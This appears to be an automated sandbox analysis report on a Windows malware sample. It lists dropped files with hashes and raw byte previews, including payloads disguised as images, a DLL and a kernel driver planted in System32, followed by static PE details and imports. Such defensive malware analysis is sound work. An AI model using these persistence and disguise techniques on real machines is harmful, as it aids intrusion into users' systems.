MD5:	10A818386411EE834D99AE6B7B68BE71
SHA1:	27644B42B02F00E772DCCB8D3E5C6976C4A02386
SHA-256:	7545AC54F4BDFE8A9A271D30A233F8717CA692A6797CA775DE1B7D3EAAB1E066
SHA-512:	BDC5F1C9A78CA677D8B7AFA2C2F0DE95337C5850F794B66D42CAE6641EF1F8D24D0F0E98D295F35E71EBE60760AD17DA1F682472D7E4F61613441119484EFB8F
Malicious:	false
Preview:	.PNG........IHDR..............$.....PLTE.....H..K..F.....G..H..G..H..H..D..I..G..Gf.Ff.Hf.Ff.E..H..H..H..H..H........H........H..G........G....................G..H........................................................................................................?..H..G..H..G..G..H.HH.HH.GG.GG.GG.II.GG.??.GG.DD.HH.OO.GG.HH.HH.II.HH.GG.HH.HH.GG.GG.HH.GG.UU.??.GG.GG.HH.HH.GG.33...................GG.HH..G..Gf.F...................GG.HH.GG.HH.H................f.Fg.Fg.Fb.Di.Cf.Gg.Fg.Gf.Fe.G..K.KKi.Fi.K.HHg.G....5n&....tRNS...3.Df....^..wU.MwU...3UMw....f.D"....<.....o.....+..M...^......-......1V{........-.........^...M.+....o......<."D.f...........wU3...^.."..fD".3.K.X.....IDATx....jSQ...Z#x U.T<S............8.D..#..+...A.Y.l.0E...y/!.....E.....;G^,<.A.........\|..z....\|.A;.@..{....... ..>.c.U;.@......u...v..`..`...a..`..`..`..`..`..`..`..`..`...O<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.6.G^l.........4z.#.........=.=.h.....kw...._..~._:.[;.6..C....

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\drops[1].jpg

Download File

Process:	C:\Users\user\Documents\RgZ5EJ.exe
File Type:	PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	37274
Entropy (8bit):	7.991781062764932
Encrypted:	true
SSDEEP:	768:6uBASoT9gu8yCOpS/DCNuoaa7SOjrX+ACdA7EtGKDRklnvga371DNpnN7s:fGSfyxENa7ZCRtxylnvgAVNI
MD5:	6D4DEB9526F3973DE0F9DCE9392F8EA7
SHA1:	520128FB9BAB7064BEA992E4427B924073E58C0E
SHA-256:	B415D73DC6CBEEE59736ADD1AF397B6982BDB2B3A9E994797EE6AF5979E58FD1
SHA-512:	F07E0DAEEE5C54BC8DB462630F46A339D9ED0AF346BAB113B4EC7FD2BC463AFC04CBD0FDFC8D9F54528B7127AA7735575A255B85F2D0B3CCD518FC5DC39BA447
Malicious:	false
Preview:	.PNG........IHDR.............\r.f....pHYs............... .IDATx....n.....&E!J.%M.."..9....."...H..L.....LI:.)..K7..!.4Q...{..d.....[......Z{......<.y<9.o...w....]...q..q..q..q..q..q..q..q..q..q..q..q..q..q..q..q..q......3%.F.1p..rD%.;%rD.1p.....qz.....1n.....p.....qz.....1n...0.^.I..9......c.Z....$.Q..K=.OKp=...e%.(.R.....p-tzD..9.m...+.Un...S...5..F..D......R.ys.?W.....\|]....Ke......G......U..1....#^..1\|..!.O.OWr.H.w.P..p.V..H.wz..mo.U....?F......k7[2.."....+...&]#..d......<...V\{P..d...8=.9..Al....Wr......Pc`......X.g..\.\|i7.....O.B.g.p...]..%.^..T.w....a.u..x..zZ........V.....$.Y.6.t....?.g.~..@.93.g.....lPn..o...7.p.J.Cq....J....3.<]...X...w..o..\.u...Jv...3e.).9q..6(..s...^.k...#..[Vr.t.47J}..M......:.....I%.Q\cPN.n...R.z;3J..c....q.].~s.J..._.d.........y....ur{:v...A.I%....)....t{..(.g.o...;....>..7)~{P~_.....5t{X<.x....J....J.0..YY\b.-&.?...Y7.$.X_.e.......{..Jd.3w...l......q.M...&..*...~f...[./.......w..U.^.{q.`......GVV...5.;Z.`W.-uxV...

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\FOM-50[1].jpg

Download File

Process:	C:\Users\user\Documents\RgZ5EJ.exe
File Type:	JPEG image data, JFIF standard 1.01, resolution (DPI), density 144x144, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=5], baseline, precision 8, 75x55, components 3
Category:	dropped
Size (bytes):	55085
Entropy (8bit):	7.99273647746538
Encrypted:	true
SSDEEP:	1536:puwkqL5y4p4KnRWlENc3PGdLLv/PJctIJPc+pifyC:kQM4+B/MLL/PmaG
MD5:	DC44AE348E6A74B3A74871020FDFAC74
SHA1:	B223020A5F82FF15FD5E4930477F38F34C9CB919
SHA-256:	48F258037BE0FFE663DA3BCD47DBA22094CC31940083D9E18A71882BDC1ECDB8
SHA-512:	5FB13A8CE2206119C76325504DEF61D4277A73D71D79157AE564F326D6FC18080218633CE7C708F31A81D6CD1A5AD8A903CFE1CC0C57183B4809A9C12E32A429
Malicious:	false
Preview:	......JFIF.............ZExif..MM..................J............Q...........Q..........%Q..........%...............C....................................................................C.......................................................................7.K.."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()456789:CDEF..................ijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..K.Si..ZM.....x....8.h<...."..V...F(..1M<..L+.......:.(..\.ANo.)...82...O...P...2...db..u=.4...Wm%=.u&..:.\.W+L#.%5.5..q..E.PQ.....M#..c4....H.".A.R......\#..E.Vg8....PU..Yrh......"..;...i6QE................HJJKLINOP..ST.VWXYZ[\.^_`abcdefghijklmnopqrstuvwxyz{\|}~..a.....=..>.A

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\a[1].gif

Download File

Process:	C:\Users\user\Desktop\149876985-734579485.05.exe
File Type:	PNG image data, 512 x 512, 8-bit colormap, non-interlaced
Category:	dropped
Size (bytes):	135589
Entropy (8bit):	7.995304392539578
Encrypted:	true
SSDEEP:	3072:CQFCJFvegK8iS+UKaskx87eJd0Cn/zUR7Tq:CKwvehSbsY8anIde
MD5:	0DDD3F02B74B01D739C45956D8FD12B7
SHA1:	561836F6228E24180238DF9456707A2443C5795C
SHA-256:	2D3C7FBB4FBA459808F20FDC293CDC09951110302111526BC467F84A6F82F8F6
SHA-512:	0D6A7700FA1B8600CAE7163EFFCD35F97B73018ECB9A17821A690C179155199689D899F8DCAD9774F486C9F28F4D127BFCA47E6D88CC72FB2CDA32F7F3D90238
Malicious:	false
Preview:	.PNG........IHDR..............$.....PLTE.....H..K..F.....G..H..G..H..H..D..I..G..Gf.Ff.Hf.Ff.E..H..H..H..H..H........H........H..G........G....................G..H........................................................................................................?..H..G..H..G..G..H.HH.HH.GG.GG.GG.II.GG.??.GG.DD.HH.OO.GG.HH.HH.II.HH.GG.HH.HH.GG.GG.HH.GG.UU.??.GG.GG.HH.HH.GG.33...................GG.HH..G..Gf.F...................GG.HH.GG.HH.H................f.Fg.Fg.Fb.Di.Cf.Gg.Fg.Gf.Fe.G..K.KKi.Fi.K.HHg.G....5n&....tRNS...3.Df....^..wU.MwU...3UMw....f.D"....<.....o.....+..M...^......-......1V{........-.........^...M.+....o......<."D.f...........wU3...^.."..fD".3.K.X.....IDATx....jSQ...Z#x U.T<S............8.D..#..+...A.Y.l.0E...y/!.....E.....;G^,<.A.........\|..z....\|.A;.@..{....... ..>.c.U;.@......u...v..`..`...a..`..`..`..`..`..`..`..`..`...O<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.6.G^l.........4z.#.........=.=.h.....kw...._..~._:.[;.6..C....

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\s[1].dat

Download File

Process:	C:\Users\user\Desktop\149876985-734579485.05.exe
File Type:	data
Category:	dropped
Size (bytes):	28272
Entropy (8bit):	7.711613945668242
Encrypted:	false
SSDEEP:	384:9LegCRh1vC6FvsdvaUv2rywX0IK+H8Ku7jVolZ7XRJsKYkGDfRRX5qSgUWCHopQF:85F1FUdy422IK+gAZt2i0YPpQn4GMe
MD5:	48799898E02E7C1A351095A6FAAEB500
SHA1:	FF6CD48BFF649B96A3C34EA8E679D10A9522F87F
SHA-256:	C21EDBD56495A8E1733F59D648874D77DC5685DCBA4FBC9EF04AC3ED3514BD65
SHA-512:	DF7DFFFFCDE509587AA9FA4CA58A1E10430425911E3B70C0F5903AFE54C64F7128776729C79BBC0C0CC2C7CD1BE7D4C70B16973E2BF107D685938B963F53A33D
Malicious:	false
Preview:	..(.........GG..............................................P..........{Z.z7..c_6,./]@H]<0}>_PPQ%q34.FAZz34z>5)Z75>?.225.5555555..G\.@f.z\.@f.{\.@f...\.@f...\.@f...\.@f...\.@f...\.@f...\.@f4......4444444444444444444444444dq44P.<4.g.bbbbbbbbb.b@bi`kbbXbbbpbbbbbb..bbbrbbbbcbbbbbbrbbb`bbdbcbdbcbdbcbbbbbb.bbbfbb..bbcbbbbbfbbbbbbrbbbbbbbbrbbbbbbrbbbbbbbbbbrbbbbbbbbbbbr.bbJbbbb.bb.abbb.bb.cbbb2bb.\|bbb.bb&bbb.#bb~bbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbb"bb.cbbbbbbbbbbbbbbbbbbbbbbbbbbL...n....6.......4..................:..r\...gr.......S.......!..............S..[u?:/N////-///.///-///.//////////////o//......"............................................................................?.........................]s/./L///.,///.///+///e//////////////o//mC...nb...............O..............A..CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC

C:\Users\user\Documents\MsMpList.dat

Download File

Process:	C:\Users\user\Desktop\149876985-734579485.05.exe
File Type:	PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	3889557
Entropy (8bit):	7.9999387512441205
Encrypted:	true
SSDEEP:	98304:9AnkiLOZS/hpXbdHpPcG59BO8NQXIeXXv5L4f2fN3yQWF+A:yndLOZS/DtpPJRO8OHBL4f2UQI+A
MD5:	AEB839AF0E0029F84CB23751AD327F45
SHA1:	7EB4962B96CBA033BDA36DBE86CD7D5C7CED885C
SHA-256:	E6DAD5400BB8A98A5C8A94FD24E4166B0F816E708BEB3946164C12978C75D3E3
SHA-512:	1062B53845BB815126F234A477CBD88E36AE632B6952DD9C26085749A536CEF5E1F03A195D75FB5977FF0D839E1B9404FBC46336EFD196A8862B2961CD966F0A
Malicious:	false
Preview:	.PNG........IHDR.............\r.f....pHYs............... .IDATx....n.....&E!J.%M.."..9....."...H..L.....LI:.)..K7..!.4Q...{..d.....[......Z{......<.y<9.o...w....]...q..q..q..q..q..q..q..q..q..q..q..q..q..q..q..q..q......3%.F.1p..rD%.;%rD.1p.....qz.....1n.....p.....qz.....1n...0.^.I..9......c.Z....$.Q..K=.OKp=...e%.(.R.....p-tzD..9.m...+.Un...S...5..F..D......R.ys.?W.....\|]....Ke......G......U..1....#^..1\|..!.O.OWr.H.w.P..p.V..H.wz..mo.U....?F......k7[2.."....+...&]#..d......<...V\{P..d...8=.9..Al....Wr......Pc`......X.g..\.\|i7.....O.B.g.p...]..%.^..T.w....a.u..x..zZ........V.....$.Y.6.t....?.g.~..@.93.g.....lPn..o...7.p.J.Cq....J....3.<]...X...w..o..\.u...Jv...3e.).9q..6(..s...^.k...#..[Vr.t.47J}..M......:.....I%.Q\cPN.n...R.z;3J..c....q.].~s.J..._.d.........y....ur{:v...A.I%....)....t{..(.g.o...;....>..7)~{P~_.....5t{X<.x....J....J.0..YY\b.-&.?...Y7.$.X_.e.......{..Jd.3w...l......q.M...&..*...~f...[./.......w..U.^.{q.`......GVV...5.;Z.`W.-uxV...

C:\Users\user\Documents\RgZ5EJ.exe

Download File

Process:	C:\Users\user\Desktop\149876985-734579485.05.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	133136
Entropy (8bit):	6.350273548571922
Encrypted:	false
SSDEEP:	3072:NtmH5WKiSogv0HSCcTwk7ZaxbXq+d1ftrt+armpQowbFqD:NYZEHG0yfTPFas+dZZrL9MD
MD5:	D3709B25AFD8AC9B63CBD4E1E1D962B9
SHA1:	6281A108C7077B198241159C632749EEC5E0ECA8
SHA-256:	D2537DC4944653EFCD48DE73961034CFD64FB7C8E1BA631A88BBA62CCCC11948
SHA-512:	625F46D37BCA0F2505F46D64E7706C27D6448B213FE8D675AD6DF1D994A87E9CEECD7FB0DEFF35FDDD87805074E3920444700F70B943FAB819770D66D9E6B7AB
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......s.E.7w+.7w+.7w+...V.?w+...E..w+...F.Qw+...P.5w+.>...>w+.7w..w+...Y.>w+...W.6w+...S.6w+.Rich7w+.........PE..d...Kd.]..........#................P].........@............................................................................................,...x...............,........H...........D...............................................@..@............................text...)......................... ..`.rdata..x_...@...`..................@..@.data....:..........................@....pdata..,...........................@..@.rsrc...............................@..@................................................................................................................................................................................................................................................................................................................

C:\Users\user\Documents\WordpadFilter.db

Download File

Process:	C:\Users\user\Desktop\149876985-734579485.05.exe
File Type:	GIF image data, version 89a, 10 x 10
Category:	dropped
Size (bytes):	8228
Entropy (8bit):	7.978950383199934
Encrypted:	false
SSDEEP:	192:2Bue6hKvTlByz2GqpoPTgyXrByFCt4lXp9tyey2Q0l:2BuNhyTlBU2dp+1XrBuCgp9vU0l
MD5:	2C6CED1DAD43BD03EE79016DB2D16389
SHA1:	40DEED7230ACADA1BEE666127C5C2FC45C25BC30
SHA-256:	261B5E54793E52EC1EA1554EC7FD20BD2873EA752CD76058AB9D39BCAAAAE1E4
SHA-512:	6B7B739FCD3FF60F2F16BAD7920C366BE6D48BF88B565A0DADB01A42026F6596F1AEACE59FB56513EBA52FD3D3516812E0C9506903AEAF1BE364C7826FB0479A
Malicious:	false
Preview:	GIF89a.......,.}.........;.;G_fx5.#DV..g..}A/...l=.2......'o...!.....e.,t..o8.^...B^x..6IX.DC.Oa..../_...n$_.y..+jb..r...Y4/Rv.....(;....$...g..........~.IN ...-<R7....eZ..q4.....~...}....~t<......\|}....x.)U3.`U..s....W..WY..w+o-[..{..l..i`.:.......L'.>...$. .a.x.2#y_(9....d,....=n...%...c.........dq.nfLI....!1..2...`.,...~....)w.5E 1.V...0."...cu...p........^\|@.-w..+...M.(.GK.y}.N.........}.....-..e.......X...GE.\|.-._..*.M.....Mc........9/..fQ.Z.....W.....s...........k?C.q.u.-...Q..."..kt..A..128.......7#...~....1.`..:C.(.C.<y.(..<..'..+.!&.....r..I.....d...W.....-.'.Ec`Nv.8).....!....?.....\..N.3..D...U.....(..#sdY..D"...p.>.W.Q...}.. ..2.A('Q\_y...\|..Az..JO.B.A..Q05.)..Q..zd..V..l......S.....dS.x....z^..z...).a.....4.G..........M.,..a..U...\....G...$...Q.7...@.x...x.s..R..0.-3...).x.D..f.I..n.....}..{.p.q.%,.lF.f.Up..UM..Y..1............R.....F.._....Y..u...e^.c...f.'..U.W1g..e#J...Z.W.....w.[...........R.?.m......"@.f..V..fxI

C:\Users\user\Documents\vselog.dll

Download File

Process:	C:\Users\user\Desktop\149876985-734579485.05.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	122880
Entropy (8bit):	6.001999254831957
Encrypted:	false
SSDEEP:	1536:Jd4E7qItA4nbQ0R3rh4Q8/0fp0uQ4S8S7YDLbnTPtrTzvesW7dj9dl4Cp52Fb:Jf7qG3Gyp0p4ZmGLbTPJT7y7aCp5gb
MD5:	BCA84C5D1DD7528F2C045A86E5EDA5BF
SHA1:	CA369F8BB9BF64CE38800BA754D539C5EAD819E3
SHA-256:	E17A798981629F0F389F18126547C7BCB13AD2FBFEA52B5826C295FEF3A69E0D
SHA-512:	8AD64F5AF59746C264F5C2A970A68DFF2706FF82460B0F81F4B056087EA4272214269C3A44F7BC2DF089B7195782BE33FEF4B3370B24661955FAF26C49A822CD
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......d... .E .E .Ek..D%.Ek..D..Ek..D*.E0N.D).E0N.D..E0N.D..Ek..D#.E .EB.EhO.D!.EhO.D!.EhOHE!.E . E!.EhO.D!.ERich .E........PE..d....w.g.........." ...).....................................................0............`.........................................`...........(.......H.................... ..x... ...8...............................@............ ...............................text............................... ..`.rdata....... ......................@..@.data...0...........................@....pdata..............................@..@.rsrc...H...........................@..@.reloc..x.... ......................@..B........................................................................................................................................................................................................................................

C:\Windows\System32\drivers\189atohci.sys

Download File

Process:	C:\Users\user\Desktop\149876985-734579485.05.exe
File Type:	PE32+ executable (native) x86-64, for MS Windows
Category:	dropped
Size (bytes):	28272
Entropy (8bit):	6.228992202739271
Encrypted:	false
SSDEEP:	384:73YUY30d1Kgf4AtcTmwZ/22a97C5ohYh3IB96Oys2+l0skiM0HMFrba8no0ceD/O:7OUkgfdZ9pRyv+uPzCMHo3q4tDghk
MD5:	34A10673F0BBE2C68721153FF4B6F5CC
SHA1:	B99BEB702B5B8233F692685454FFF67B1F27419E
SHA-256:	E814FBB0F3BF56846A244B6887F968B71310B6E6899FCA8496485B681BEB23F9
SHA-512:	E52CF8FDD803AB297626E8FA7BE851300278622D42B09731CCE6B9B64992A6F86CF4E065F5CA072E14B40B991B8E54DAF5B3D33DC6B0B5E8617D4DA4E7F68D05
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........ri...:...:...:...:...:...:...:...:...:...:...:...:...:...:...:...:...:Rich...:........................PE..d....S.V.........."......:..........l...........................................................................................................(............`.......P..p.......D....A...............................................@...............................text....,.......................... ..h.rdata.......@.......2..............@..H.data........P.......:..............@....pdata.......`.......<..............@..HPAGE....l....p.......>.............. ..`INIT.................@.............. ....rsrc................J..............@..B.reloc...............N..............@..B........................................................................................................................................................................................

C:\xxxx.ini

Download File

Process:	C:\Windows\SysWOW64\cmd.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	2
Entropy (8bit):	1.0
Encrypted:	false
SSDEEP:	3:y:y
MD5:	81051BCC2CF1BEDF378224B0A93E2877
SHA1:	BA8AB5A0280B953AA97435FF8946CBCBB2755A27
SHA-256:	7EB70257593DA06F682A3DDDA54A9D260D4FC514F645237F5CA74B08F8DA61A6
SHA-512:	1B302A2F1E624A5FB5AD94DDC4E5F8BFD74D26FA37512D0E5FACE303D8C40EEE0D0FFA3649F5DA43F439914D128166CB6C4774A7CAA3B174D7535451EB697B5D
Malicious:	false
Preview:	..

\Device\Mup\localhost\pipe\atsvc

Download File

Process:	C:\Program Files (x86)\YYAfLM\YYAfLM.exe
File Type:	GLS_BINARY_LSB_FIRST
Category:	dropped
Size (bytes):	297
Entropy (8bit):	4.443412081863533
Encrypted:	false
SSDEEP:	3:ri9K0/ldl//lll1siQg4d1ywsiQI5kZt8jtl/zi8tkHsl8/lP92lU8IAuUWKznl2:ri9TDTwPYtyjtOsNaG4oifpx
MD5:	13E92D53216562BD996C6FF57E4F78E0
SHA1:	17CBC9320227FE9883EAED9138BC2BCF331020D8
SHA-256:	EE9BC070D8944E385FF23BF59E40F05E64D0AADCEE095311D9B2B46B5BF2BCF0
SHA-512:	974E31C3BBC46C8458D4B92D8E97C83A7D16D9D8391CE542F84293C9C73F67B835D054F7BFDE6586FB3A4FE765AC93B4388FF7BE6BB6E8C67CDB869FE68C7962
Malicious:	false
Preview:	..........9.....................IY..D@.$.621.......]..........+.H`........IY..D@.$.621......,..l..@E....................NTLMSSP.............0.......(.....aJ....user-PCWORKGROUP........t.X.................NTLMSSP.........X.......X.......X.......X.......X.......X...5....aJ...._.c.;...gu..v.i

Static File Info

General

File type:	PE32+ executable (GUI) x86-64, for MS Windows
Entropy (8bit):	0.1029884613457865
TrID:	Win64 Executable GUI (202006/5) 92.65% Win64 Executable (generic) (12005/4) 5.51% Generic Win/DOS Executable (2004/3) 0.92% DOS Executable Generic (2002/1) 0.92% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	149876985-734579485.05.exe
File size:	30'939'136 bytes
MD5:	d21ced168a5267499378453eee404703
SHA1:	29ac1c528970d1e2423deb11b5998a2eb7c0842b
SHA256:	419fbd9b877c7d0c7f9874b5a87b8f446fe599608731ac5b447acc74315e6a67
SHA512:	65ce64e21c04ff22a05a4f6c7c5e8b7907c49c110d7cc76b933b0a8b801dd22eb598b384f8fd07f4cc9b8cc715cf06f78e67e89b35f23d36e94d1097a7e534d7
SSDEEP:	6144:kxdVJksCr6RDFm2CDblp8VSZz27KcwiVTrG2Z:kx9GQvCDb79fcdfG2Z
TLSH:	6B677B06B3A460F6D036C579CDA36256F7B278254B6547CF0660CA2ADF237D2BE39311
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......................8.X.......[...............................M.......J.......Z......._.....Rich............PE..d.....Qf..........#

File Icon


Icon Hash:	d8ac2684e466bc99

Static PE Info

General

Entrypoint:	0x14001653c
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x140000000
Subsystem:	windows gui
Image File Characteristics:	RELOCS_STRIPPED, EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
DLL Characteristics:	TERMINAL_SERVER_AWARE
Time Stamp:	0x6651ECA8 [Sat May 25 13:50:32 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	5
OS Version Minor:	2
File Version Major:	5
File Version Minor:	2
Subsystem Version Major:	5
Subsystem Version Minor:	2
Import Hash:	de4966736831656d2e43159e1e0b8528

Entrypoint Preview

Instruction
dec eax
sub esp, 28h
call 00007FF8F0B2E884h
dec eax
add esp, 28h
jmp 00007FF8F0B16BFCh
int3
int3
dec eax
mov dword ptr [esp+08h], ecx
dec eax
sub esp, 00000088h
dec eax
lea ecx, dword ptr [0001219Dh]
call dword ptr [00005EEFh]
dec esp
mov ebx, dword ptr [00012288h]
dec esp
mov dword ptr [esp+58h], ebx
inc ebp
xor eax, eax
dec eax
lea edx, dword ptr [esp+60h]
dec eax
mov ecx, dword ptr [esp+58h]
call 00007FF8F0B3137Ch
dec eax
mov dword ptr [esp+50h], eax
dec eax
cmp dword ptr [esp+50h], 00000000h
je 00007FF8F0B2C0D3h
dec eax
mov dword ptr [esp+38h], 00000000h
dec eax
lea eax, dword ptr [esp+48h]
dec eax
mov dword ptr [esp+30h], eax
dec eax
lea eax, dword ptr [esp+40h]
dec eax
mov dword ptr [esp+28h], eax
dec eax
lea eax, dword ptr [00012148h]
dec eax
mov dword ptr [esp+20h], eax
dec esp
mov ecx, dword ptr [esp+50h]
dec esp
mov eax, dword ptr [esp+58h]
dec eax
mov edx, dword ptr [esp+60h]
xor ecx, ecx
call 00007FF8F0B3132Ah
jmp 00007FF8F0B2C0B4h
dec eax
mov eax, dword ptr [esp+00000088h]
dec eax
mov dword ptr [00012214h], eax
dec eax
lea eax, dword ptr [esp+00000088h]
dec eax
add eax, 08h
dec eax
mov dword ptr [000121A1h], eax
dec eax
mov eax, dword ptr [000121FAh]
dec eax
mov dword ptr [0001206Bh], eax

Rich Headers

Programming Language:

[ASM] VS2008 SP1 build 30729
[ C ] VS2005 build 50727
[IMP] VS2005 build 50727
[ C ] VS2008 SP1 build 30729
[C++] VS2008 SP1 build 30729
[RES] VS2008 build 21022
[LNK] VS2008 SP1 build 30729

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x22f48	0x8c	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x1d92000	0x16d0	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x1d91000	0xe04	.pdata
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x1d94000	0x488	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x1c000	0x7d8	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x1abee	0x1ac00	891377dbe3f943685d014a591c7cd98e	False	0.583883980724299	data	6.379817410240486	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x1c000	0x88b2	0x8a00	e5acd87b74d5bb39b04f039abb7e914d	False	0.37290534420289856	data	4.812112495830329	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0x25000	0x1d6b5e0	0x1d5ae00	d7d68c5d0621e1e72bd42ee5ee185d1a	unknown	unknown	unknown	unknown	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.pdata	0x1d91000	0xe04	0x1000	0a3058f0bc5962580fb190e5121f56f4	False	0.469482421875	data	4.803769927328999	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.rsrc	0x1d92000	0x16d0	0x1800	d6a23045f4af048d53d3d17b6c9fc63e	False	0.28369140625	data	4.042062057986497	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x1d94000	0x740	0x800	f5b160400e6dfc47d85bf70f344bd6cf	False	0.43212890625	GLS_BINARY_LSB_FIRST	4.319333330336306	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_ICON	0x1d92210	0x2e8	Device independent bitmap graphic, 32 x 64 x 4, image size 640	English	United States	0.1881720430107527
RT_ICON	0x1d924f8	0x128	Device independent bitmap graphic, 16 x 32 x 4, image size 192	English	United States	0.3344594594594595
RT_ICON	0x1d92620	0x668	Device independent bitmap graphic, 48 x 96 x 4, image size 1536	English	United States	0.11158536585365854
RT_DIALOG	0x1d92cb8	0xf2	PGP symmetric key encrypted data - salted -	English	United States	0.5702479338842975
RT_DIALOG	0x1d92db0	0xba	PGP symmetric key encrypted data - salted -	English	United States	0.7580645161290323
RT_GROUP_ICON	0x1d92c88	0x30	data	English	United States	0.9166666666666666
RT_VERSION	0x1d92e70	0x2fc	data	English	United States	0.5
RT_MANIFEST	0x1d93170	0x559	XML 1.0 document, ASCII text, with very long lines (1369), with no line terminators	English	United States	0.45361577794010227

Imports

DLL	Import
KERNEL32.dll	SetEnvironmentVariableW, CreateProcessW, FindNextFileW, SetFilePointer, GetEnvironmentVariableW, IsValidCodePage, CreateThread, Sleep, GlobalUnlock, GlobalLock, GlobalAlloc, TerminateThread, IsBadReadPtr, CopyFileW, CreateDirectoryW, GetFileAttributesW, GetFullPathNameW, LoadLibraryExW, ExpandEnvironmentStringsW, GetFileSize, CompareStringW, GetCurrentProcess, ExitProcess, GetCurrentThread, GetModuleHandleW, CreateFileW, WideCharToMultiByte, WriteFile, FindResourceExW, GlobalMemoryStatus, GetSystemInfo, CallNamedPipeW, SetLastError, HeapReAlloc, HeapFree, FindResourceW, SizeofResource, GetProcessHeap, HeapAlloc, LoadResource, LockResource, LoadLibraryW, GetLastError, GetMailslotInfo, LoadLibraryA, WaitForSingleObject, FindFirstFileW, FindClose, ReadFile, GetLocalTime, MultiByteToWideChar, GetCommandLineW, GetModuleFileNameW, FreeLibrary, CloseHandle, SetCurrentDirectoryW, GetUserDefaultLCID, GetVersionExW, AddVectoredExceptionHandler, GetTickCount, GetModuleHandleA, GetProcAddress, GetComputerNameW, GetStartupInfoW, CreateMailslotW, HeapSize, GetLocaleInfoA, GetStringTypeW, GetStringTypeA, LCMapStringW, LCMapStringA, InitializeCriticalSectionAndSpinCount, EnterCriticalSection, LeaveCriticalSection, GetSystemTimeAsFileTime, GetCurrentProcessId, QueryPerformanceCounter, DeleteCriticalSection, GetFileType, SetHandleCount, GetEnvironmentStringsW, FreeEnvironmentStringsW, GetEnvironmentStrings, FreeEnvironmentStringsA, RtlUnwindEx, FlsAlloc, GetCurrentThreadId, FlsFree, FlsSetValue, FlsGetValue, DecodePointer, EncodePointer, GetOEMCP, GetACP, GetCPInfo, HeapCreate, HeapSetInformation, GetModuleFileNameA, GetStdHandle, RtlCaptureContext, RtlLookupFunctionEntry, RtlVirtualUnwind, IsDebuggerPresent, SetUnhandledExceptionFilter, UnhandledExceptionFilter, TerminateProcess, GetStartupInfoA, VirtualAlloc
ADVAPI32.dll	GetNumberOfEventLogRecords, CloseEventLog, RegCloseKey, RegQueryValueExW, RegOpenKeyExW, RegEnumValueW, GetUserNameW, GetUserNameA, OpenEventLogW
